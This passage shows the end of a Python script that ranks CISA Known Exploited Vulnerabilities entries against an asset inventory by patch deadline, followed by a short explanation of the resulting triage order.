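    # Entries with matching assets first, then by earliest patch deadline.
    rows.sort(key=lambda r: (not r["assets"], r["patch_by"]))
    return rows


def example_workload(now_iso="2026-05-15T10:00:00+00:00"):
    """Run the constructed snapshot against the constructed inventory at a fixed time."""
    return kev_workload(KEV_SNAPSHOT, ASSETS, datetime.fromisoformat(now_iso))


if __name__ == "__main__":
    for row in example_workload():
        print(row["cve"], row["assets"], row["patch_by"].date(),
              "ASSESS OVERDUE" if row["assess_overdue"] else "")
```

Evaluated the morning after the additions, every entry is already past its 24-hour assessment deadline, the two internet-facing hits (the firewall and the cPanel host) carry a patch deadline three days from dateAdded, the internal kernel and LiteLLM hosts keep CISA's dueDate, and the Ivanti entry sorts last because no inventoried asset matches it, which is itself something to verify rather than ignore.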